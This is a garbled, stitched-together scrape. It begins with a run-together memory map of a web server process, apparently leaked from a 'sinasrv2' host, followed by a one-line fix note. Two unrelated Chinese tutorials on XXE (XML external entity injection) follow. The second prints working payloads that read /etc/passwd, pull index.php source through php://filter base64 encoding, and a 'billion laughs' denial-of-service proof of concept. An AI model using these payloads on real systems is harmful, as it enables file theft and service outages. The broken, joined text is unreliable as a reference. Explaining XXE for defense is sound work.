/lib/librt-2.5.so007d5000-007d6000 rw-p 00007000 fd:01 1757624 /lib/librt-2.5.so007d8000-00813000 r-xp 00000000 fd:01 1757632 /lib/libsepol.so.100813000-00814000 rw-p 0003b000 fd:01 1757632 /lib/libsepol.so.100814000-0081e000 rw-p 00000000 00:00 000820000-00836000 r-xp 00000000 fd:01 1757633 /lib/libselinux.so.100836000-00838000 rw-p 00015000 fd:01 1757633 /lib/libselinux.so.10083a000-00875000 r-xp 00000000 fd:01 69524 /usr/lib/libcurl.so.3.0.000875000-00876000 rw-p 0003b000 fd:01 69524 /usr/lib/libcurl.so.3.0.000929000-00a53000 r-xp 00000000 fd:01 1757639 /lib/libcrypto.so.0.9.8e00a53000-00a66000 rw-p 00129000 fd:01 1757639 /lib/libcrypto.so.0.9.8e00a66000-00a6a000 rw-p 00000000 00:00 000a6c000-00a75000 r-xp 00000000 fd:01 1755716 /lib/libcrypt-2.5.so00a75000-00a76000 r--p 00008000 fd:01 1755716 /lib/libcrypt-2.5.so00a76000-00a77000 rw-p 00009000 fd:01 1755716 /lib/libcrypt-2.5.so00a77000-00a9e000 rw-p 00000000 00:00 000d05000-00d18000 r-xp 00000000 fd:01 1757627 /lib/libnsl-2.5.so00d18000-00d19000 r--p 00012000 fd:01 1757627/lib/libnsl-2.5.so00d19000-00d1a000 rw-p 00013000 fd:01 1757627 /lib/libnsl-2.5.so00d1a000-00d1c000 rw-p 00000000 00:00 000d6e000-00d7d000 r-xp 00000000 fd:01 1757642 /lib/libresolv-2.5.so00d7d000-00d7e000 r--p 0000e000 fd:01 1757642 /lib/libresolv-2.5.so00d7e000-00d7f000 rw-p 0000f000 fd:01 1757642 /lib/libresolv-2.5.so00d7f000-00d81000 rw-p 00000000 00:00 000d83000-00d85000 r-xp 00000000 fd:01 1757641 /lib/libkeyutils-1.2.so00d85000-00d86000 rw-p 00001000 fd:01 1757641 /lib/libkeyutils-1.2.so00d88000-00d8a000 r-xp 00000000 fd:01 1757643 /lib/libcom_err.so.2.100d8a000-00d8b000 rw-p 00001000 fd:01 1757643 /lib/libcom_err.so.2.100de7000-00def000 r-xp 00000000 fd:01 83283 /usr/lib/libkrb5support.so.0.100def000-00df0000 rw-p 00007000 fd:01 83283 /usr/lib/libkrb5support.so.0.103004000-03047000 r-xp 00000000 fd:01 1757644 /lib/libssl.so.0.9.8e03047000-0304b000 rw-p 00042000 fd:01 1757644 /lib/libssl.so.0.9.8e08048000-080a2000 r-xp 00000000 fd:01 586304 /usr/local/sinasrv2/sbin/httpd080a2000-080a5000 rw-p 00059000 fd:01 586304/usr/local/sinasrv2/sbin/httpd080a5000-080a8000 rw-p 00000000 00:00 009c1f000-0a1e7000 rw-p 00000000 00:00 0 [heap]4c49e000-4c5bf000 r-xp 00000000 fd:01 585977 /usr/lib/mysql/libmysqlclient.so.15.0.04c5bf000-4c601000 rw-p 00120000 fd:01 585977 /usr/lib/mysql/libmysqlclient.so.15.0.04c601000-4c602000 rw-p 00000000 00:00 0b6cdf000-b6d60000 rw-p 00000000 00:00 0b6d60000-b6d6e000 r-xp 00000000 fd:01 70416 /usr/lib/libmagic.so.1.0.0b6d6e000-b6d6f000 rw-p 0000e000 fd:01 70416 /usr/lib/libmagic.so.1.0.0b6d6f000-b6d7d000 r-xp 00000000 fd:01 83701 /usr/local/lib/libsvn_diff-1.so.0.0.0b6d7d000-b6d7e000 rw-p 0000e000 fd:01 83701 /usr/local/lib/libsvn_diff-1.so.0.0.0b6d7e000-b6d88000 r-xp 00000000 fd:01 83624 /usr/local/lib/libsvn_delta-1.so.0.0.0b6d88000-b6d89000 rw-p 00009000 fd:01 83624 /usr/local/lib/libsvn_delta-1.so.0.0.0b6d89000-b6dc6000 r-xp 00000000 fd:01 83680 /usr/local/lib/libsvn_ra_neon-1.so.0.0.0b6dc6000-b6dc8000 rw-p 0003d000 fd:01 83680 /usr/local/lib/libsvn_ra_neon-1.so.0.0.0b6dc8000-b6de0000 r-xp 00000000 fd:01 83294 /usr/lib/libsasl2.so.2.0.22b6de0000-b6de1000 rw-p 00017000 fd:01 83294 /usr/lib/libsasl2.so.2.0.22b6de1000-b6df4000 r-xp 00000000 fd:01 83654/usr/local/lib/libsvn_ra_svn-1.so.0.0.0b6df4000-b6df5000 rw-p 00012000 fd:01 83654 /usr/local/lib/libsvn_ra_svn-1.so.0.0.0b6df5000-b6e19000 r-xp 00000000 fd:01 83644 /usr/local/lib/libsvn_fs_fs-1.so.0.0.0b6e19000-b6e1a000 rw-p 00024000 fd:01 83644 /usr/local/lib/libsvn_fs_fs-1.so.0.0.0b6e1a000-b6e20000 r-xp 00000000 fd:01 83676 /usr/local/lib/libsvn_ra_local-1.so.0.0.0b6e20000-b6e21000 rw-p 00005000 fd:01 83676 /usr/local/lib/libsvn_ra_local-1.so.0.0.0b6e21000-b6e2a000 r-xp 00000000 fd:01 83688 /usr/local/lib/libsvn_ra-1.so.0.0.0b6e2a000-b6e2b000 rw-p 00008000 fd:01 83688 /usr/local/lib/libsvn_ra-1.so.0.0.0b6e2b000-b6ea7000 r-xp 00000000 fd:01 83690 /usr/local/lib/libsvn_wc-1.so.0.0.0b6ea7000-b6ea9000 rw-p 0007b000 fd:01 83690 /usr/local/lib/libsvn_wc-1.so.0.0.0b6ea9000-b6f66000 r-xp 00000000 fd:01 83619 /usr/local/lib/libsvn_subr-1.so.0.0.0b6f66000-b6f6a000 rw-p 000bc000 fd:01 83619 /usr/local/lib/libsvn_subr-1.so.0.0.0b6f6a000-b6f91000 r-xp 00000000 fd:01 83663 /usr/local/lib/libsvn_repos-1.so.0.0.0b6f91000-b6f92000 rw-p 00026000 fd:01 83663 /usr/local/lib/libsvn_repos-1.so.0.0.0b6f92000-b6f97000 r-xp 00000000 fd:01 83649 /usr/local/lib/libsvn_fs-1.so.0.0.0b6f97000-b6f98000 rw-p 00005000 fd:01 83649/usr/local/lib/libsvn_fs-1.so.0.0.0b6f98000-b6fe5000 r-xp 00000000 fd:01 83702 /usr/local/lib/libsvn_client-1.so.0.0.0b6fe5000-b6fe6000 rw-p 0004c000 fd:01 83702 /usr/local/lib/libsvn_client-1.so.0.0.0b6ff1000-b6fff000 r-xp 00000000 fd:01 618514 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/svn.sob6fff000-b7000000 rw-p 0000d000 fd:01 618514 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/svn.sob7000000-b7022000 r-xp 00000000 fd:01 618517 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/dav.sob7022000-b7023000 rw-p 00021000 fd:01 618517 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/dav.sob7023000-b702b000 r-xp 00000000 fd:01 618361 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/sockets.sob702b000-b702c000 rw-p 00007000 fd:01 618361 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/sockets.sob702c000-b703d000 r-xp 00000000 fd:01 587563 /usr/local/sinasrv2/lib/libmemcached.so.2.0.0b703d000-b703e000 rw-p 00010000 fd:01 587563 /usr/local/sinasrv2/lib/libmemcached.so.2.0.0b703e000-b7048000 r-xp 00000000 fd:01 618382 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/memcached.sob7048000-b704a000 rw-p 0000a000 fd:01 618382 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/memcached.sob704a000-b7055000 r-xp 00000000 fd:01 618512 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/memcache.sob7055000-b7056000 rw-p 0000a000 fd:01 618512 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/memcache.sob7056000-b7086000 r-xp 00000000 fd:01 79006 /usr/lib/libidn.so.11.5.19b7086000-b7087000 rw-p 0002f000 fd:01 79006 /usr/lib/libidn.so.11.5.19b7087000-b7093000 r-xp 00000000 fd:01 618343 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/curl.sob7093000-b7094000 rw-p 0000c000 fd:01 618343 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/curl.sob7094000-b709a000 r-xp 00000000 fd:01 83322 /usr/lib/libltdl.so.3.1.4b709a000-b709b000 rw-p 00005000 fd:01 83322 /usr/lib/libltdl.so.3.1.4b709b000-b70c2000 r-xp 00000000 fd:01 587550 /usr/local/sinasrv2/lib/libmcrypt.so.4.4.8b70c2000-b70c5000 rw-p 00027000 fd:01 587550 /usr/local/sinasrv2/lib/libmcrypt.so.4.4.8b70c5000-b70ca000 rw-p 00000000 00:00 0b70ce000-b70d4000 r-xp 00000000 fd:01 618350 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/json.sob70d4000-b70d5000 rw-p 00005000 fd:01 618350 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/json.sob70d5000-b7293000 r-xp 00000000 fd:01 618352 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/mbstring.sob7293000-b7295000 rw-p 001be000 fd:01 618352 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/mbstring.sob7295000-b7495000 r--p 00000000 fd:01 69201 /usr/lib/locale/locale-archiveb74b4000-b74b8000 r-xp 00000000 fd:01 1755686 /lib/libnss_dns-2.5.sob74b8000-b74b9000 r--p 00003000 fd:01 1755686 /lib/libnss_dns-2.5.sob74b9000-b74ba000 rw-p 00004000 fd:01 1755686 /lib/libnss_dns-2.5.sob74c5000-b74cc000 r--s 00000000 fd:01 162820 /usr/lib/gconv/gconv-modules.cacheb74cc000-b74d6000 rw-s 00000000 00:04 142181832 /dev/zero (deleted)b74d6000-b74df000 r-xp 00000000 fd:01 1755688 /lib/libnss_files-2.5.sob74df000-b74e0000 r--p 00008000 fd:01 1755688 /lib/libnss_files-2.5.sob74e0000-b74e1000 rw-p 00009000 fd:01 1755688 /lib/libnss_files-2.5.sob74e2000-b74e3000 r-xp 00000000 fd:01 83629 /usr/local/lib/libsvn_fs_util-1.so.0.0.0b74e3000-b74e4000 rw-p 00000000 fd:01 83629 /usr/local/lib/libsvn_fs_util-1.so.0.0.0b74e4000-b74eb000 r-xp 00000000 fd:01 618353 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/mcrypt.sob74eb000-b74ec000 rw-p 00006000 fd:01 618353 /usr/local/sinasrv2/lib/php/extensions/no-debug-non-zts-20060613/mcrypt.sob74ec000-b74ee000 r-xp 00000000 fd:01 585978 /usr/local/sinasrv2/lib/httpd/modules/mod_extract_forwarded.s ob74ee000-b74ef000 rw-p 00002000 fd:01 585978 /usr/local/sinasrv2/lib/httpd/modules/mod_extract_forwarded.s ob74ef000-b74f5000 r-xp 00000000 fd:01 586272 /usr/local/sinasrv2/lib/httpd/modules/mod_proxy_http.so b74f5000-b74f6000 rw-p 00006000 fd:01 586272 /usr/local/sinasrv2/lib/httpd/modules/mod_proxy_http.so b74f6000-b7506000 r-xp 00000000 fd:01 586267 /usr/local/sinasrv2/lib/httpd/modules/mod_proxy.so b7506000-b7507000 rw-p 0000f000 fd:01 586267 /usr/local/sinasrv2/lib/httpd/modules/mod_proxy.so b7507000-b7806000 r-xp 00000000 fd:01 587586 /usr/local/sinasrv2/lib/httpd/modules/libphp5.sob7806000-b781e000 rw-p 002fe000 fd:01 587586 /usr/local/sinasrv2/lib/httpd/modules/libphp5.sob781e000-b7823000 rw-p 00000000 00:00 0b7823000-b782f000 r-xp 00000000 fd:01 586275 /usr/local/sinasrv2/lib/httpd/modules/mod_rewrite.so b782f000-b7830000 rw-p 0000b000 fd:01 586275b7830000-b7832000 r-xp 00000000 fd:01 586221 /usr/local/sinasrv2/lib/httpd/modules/mod_alias.sob7832000-b7833000 rw-p 00001000 fd:01 586221 /usr/local/sinasrv2/lib/httpd/modules/mod_alias.sob7833000-b7836000 r-xp 00000000 fd:01 586264 /usr/local/sinasrv2/lib/httpd/modules/mod_mime.so b7836000-b7837000 rw-p 00002000 fd:01 586264 /usr/local/sinasrv2/lib/httpd/modules/mod_mime.so b7837000-b7839000 r-xp 00000000 fd:01 586276 /usr/local/sinasrv2/lib/httpd/modules/mod_setenvif.so b7839000-b783a000 rw-p 00001000 fd:01 586276 /usr/local/sinasrv2/lib/httpd/modules/mod_setenvif.so b783a000-b783d000 r-xp 00000000 fd:01 586254 /usr/local/sinasrv2/lib/httpd/modules/mod_headers.so b783d000-b783e000 rw-p 00002000 fd:01 586254 /usr/local/sinasrv2/lib/httpd/modules/mod_headers.so b783e000-b7842000 r-xp 00000000 fd:01 586279 /usr/local/sinasrv2/lib/httpd/modules/mod_status.so b7842000-b7843000 rw-p 00004000 fd:01 586279 /usr/local/sinasrv2/lib/httpd/modules/mod_status.so b7843000-b7847000 r-xp 00000000 fd:01 586260 /usr/local/sinasrv2/lib/httpd/modules/mod_log_config.so b7847000-b7848000 rw-p 00003000 fd:01 586260 /usr/local/sinasrv2/lib/httpd/modules/mod_log_config.so b7848000-b784c000 r-xp 00000000 fd:01 586245 /usr/local/sinasrv2/lib/httpd/modules/mod_deflate.so b784c000-b784d000 rw-p 00003000 fd:01 586245 /usr/local/sinasrv2/lib/httpd/modules/mod_deflate.so b784d000-b7856000 r-xp 00000000 fd:01 586257b7856000-b7857000 rw-p 00008000 fd:01 586257 /usr/local/sinasrv2/lib/httpd/modules/mod_include.so b7857000-b785b000 rw-p 00000000 00:00 0b785b000-b785e000 r-xp 00000000 fd:01 1757628 /lib/libuuid.so.1.2b785e000-b785f000 rw-p 00003000 fd:01 1757628 /lib/libuuid.so.1.2b785f000-b7884000 r-xp 00000000 fd:01 586291 /usr/local/sinasrv2/lib/libapr-1.so.0.4.2b7884000-b7885000 rw-p 00024000 fd:01 586291 /usr/local/sinasrv2/lib/libapr-1.so.0.4.2b7885000-b7886000 rw-p 00000000 00:00 0b7886000-b78a3000 r-xp 00000000 fd:01 586296 /usr/local/sinasrv2/lib/libaprutil-1.so.0.3.9b78a3000-b78a4000 rw-p 0001d000 fd:01 586296 /usr/local/sinasrv2/lib/libaprutil-1.so.0.3.9b78a4000-b78a5000 rw-p 00000000 00:00 0b78a5000-b78a6000 r-xp 00000000 fd:01 586246 /usr/local/sinasrv2/lib/httpd/modules/mod_dir.sob78a6000-b78a7000 rw-p 00000000 fd:01 586246 /usr/local/sinasrv2/lib/httpd/modules/mod_dir.sob78a7000-b78a8000 r-xp 00000000 fd:01 586249 /usr/local/sinasrv2/lib/httpd/modules/mod_env.sob78a8000-b78a9000 rw-p 00000000 fd:01 586249 /usr/local/sinasrv2/lib/httpd/modules/mod_env.sob78a9000-b78ac000 r-xp 00000000 fd:01 586253 /usr/local/sinasrv2/lib/httpd/modules/mod_filter.sob78ac000-b78ad000 rw-p 00002000 fd:01 586253 /usr/local/sinasrv2/lib/httpd/modules/mod_filter.sob78ad000-b78af000 r-xp 00000000 fd:01 586234 /usr/local/sinasrv2/lib/httpd/modules/mod_authz_host.so b78af000-b78b0000 rw-p 00001000 fd:01 586234 /usr/local/sinasrv2/lib/httpd/modules/mod_authz_host.so b78b0000-b78b1000 r-xp 00000000 00:00 0 [vdso]bfad5000-bfaf6000 rw-p 00000000 00:00 0 [stack]修复方案：修改限制一些功能或者等待补丁80sec。

从⼀道题⽬学习XXE漏洞本⽂涉及知识点实操练习： （通过该实验了解XXE漏洞的基础知识及演⽰实践。

）0x01.x x e漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注⼊漏洞，XXE漏洞发⽣在应⽤程序解析XML输⼊时，没有禁⽌外部实体的加载，导致可加载恶意外部⽂件，造成⽂件读取、命令执⾏、内⽹端⼝扫描、攻击内⽹⽹站、发起dos攻击等危害。

xxe漏洞触发的点往往是可以上传xml⽂件的位置，没有对上传的xml⽂件进⾏过滤，导致可上传恶意xml⽂件。

0x02.x m l定义XML由3个部分构成，它们分别是：⽂档类型定义(Document Type Definition，DTD)，即XML的布局语⾔；可扩展的样式语⾔(Extensible Style Language，XSL)，即XML的样式表语⾔；以及可扩展链接语⾔(Extensible Link Language，XLL)。

0x02.x m l的作⽤XML使⽤元素和属性来描述数 据。

在数据传送过程中，XML始终保留了诸如⽗/⼦关系这样的数据结构。

⼏个应⽤程序 可以共享和解析同⼀个XML⽂件，不必使⽤传统的字符串解析或拆解过程。

基本语法所有 XML 元素都须有关闭标签。

XML 标签对⼤⼩写敏感。

XML 必须正确地嵌套。

XML ⽂档必须有根元素。

XML 的属性值须加引号。

实体引⽤(在标签属性，以及对应的位置值可能会出现<>符号，但是这些符号在对应的XML中都是有特殊含义的，这时候我们必须使⽤对应html的实体对应的表⽰，⽐如<傅好对应的实体就是&lt;，>符号对应的实体就是&gt;)XML中的注释，在XML中编写注释的语法与 HTML 的语法很相似。

(<!-- -->)在 XML 中，空格会被保留,多个空格不会被合并为⼀个。

⽰例如下：<?xml version="1.0" encoding="UTF-8"?><!-- ⬆XML声明⬆ --><!DOCTYPE ⽂件名 [<!ENTITY实体名 "实体内容">]><!-- ⬆⽂档类型定义(DTD)⬆ --><元素名称 category="属性">⽂本或其他元素</元素名称><!-- ⬆⽂档元素⬆ -->0x03.x m l格式说明XML⽤于标记电⼦⽂件使其具有结构性的标记语⾔，可以⽤来标记数据、定义数据类型，是⼀种允许⽤户对⾃⼰的标记语⾔进⾏定义的源语⾔。

科普：XXE注入攻击与防御脚本安全-电脑资料0×00 前言XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题.在XML1.0标准⾏里,XML文档结构⾏里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题.0×01 威胁XXE漏洞目前还未受到广泛关注,Wooyun上几个XXE引起的安全问题:pull-in任意文件遍历/下载从开源中国的某XXE漏洞到主站shell 百度某功能XML实体注入百度某功能XML实体注入(二) 借助XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.对于不同XML解析器,对外部实体有不同处理规则,在PHP中默认处理的函数为: xml_parse和simplexml_load xml_parse的实现方式为expat库，默认情况不会解析外部实体,而simplexml_load默认情况下会解析外部实体,造成安全威胁.除PHP外，在Java，Python等处理xml的组件及函数中都可能存在此问题0×02 语法要写Payload,首先要对XML实体语法有一定了解XML中entity的定义语法为:<ol><li><!DOCTYPE filename</li><li>[</li><li><!ENTITY entity-name "entity-content"</li><li>]></li></ol>如果要引用一个外部资源,可以借助各种协议几个例子:<ol><li>file:///path/to/file.ext</li><li>http://url/file.ext</li ><li>php://filter/read=convert.base64-encode/resource=conf.php</li></ol>故构造几种简单的Payload模型如下:<ol><li><?xml version="1.0" encoding="utf-8"?></li><li><!DOCTYPE xdsec [</li><li><!ELEMENT methodn ame ANY ></li><li><!ENTITY xxe SYSTEM "file:///etc/passwd" >]></li><li><methodcall></li><li><methodname>&xxe;</m ethodname></li><li></methodcall></li></ol>亦可读取网站内容<ol><li><?xml version="1.0" encoding="utf-8"?></li><li><!DOCTYPE xdsec [</li><li><!ELEMENT methodn ame ANY ></li><li><!ENTITY xxe SYSTEM "/ text.txt" >]></li><li><methodcall></li><li><methodname>& xxe;</methodname></li><li></methodcall></li></ol> 如果包含文件失败,可能是由于读取php等文件时文件本身包含的<等字符.可以使用Base64编码绕过,如:<ol><li><?xml version="1.0" encoding="utf-8"?></li><li><!DOCTYPE xdsec [</li><li><!ELEMENT methodn ame ANY ></li><li><!ENTITY xxe SYSTEM "php://filter/read=c onvert.base64-encode/resource=index.php" >]></li><li><methodcall></li>< li><methodname>&xxe;</methodname></li><li></methodca ll></li></ol>0×03 攻击借助XXE,有几种可用且公开的攻击方式:拒绝服务POC<ol><li><?xml version = "1.0"?></li><li><!DOCTYPE lolz [ </li><li><!ENTITY lol "lol"></li><li><!ELEMENT lolz (#PCDATA)></li><li><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lo l;&lol;&lol;"></li><li><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&l ol1;&lol1;&lol1;&lol1;&lol1;&lol1;"></li><li><!ENTITY lol3 "&lo l2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"></li> <li><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&l ol3;&lol3;&lol3;"></li><li><!ENTITY lol5 "&lol4;&lol4;&lol4;&lo l4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"></li><li><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> </li><li><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lo l6;&lol6;&lol6;&lol6;"></li><li><!ENTITY lol8 "&lol7;&lol7;&lol 7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"></li><li><!ENTIT Y lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&l ol8;">]></li><li><lolz>&lol9;</lolz></li></ol>POC中中先定义了lol实体，值为”lol”的字符串,后在下面又定义了lol2实体，lol2实体引用10个lol实体，lol3又引用了10个lol2实体的值，依此类推，到了最后在lolz元素中引用的lol9中，就会存在上亿个”lol”字符串此时解析数据时未做特别处理，即可能造成拒绝服务攻击，，电脑资料《科普：XXE注入攻击与防御脚本安全》(https://)。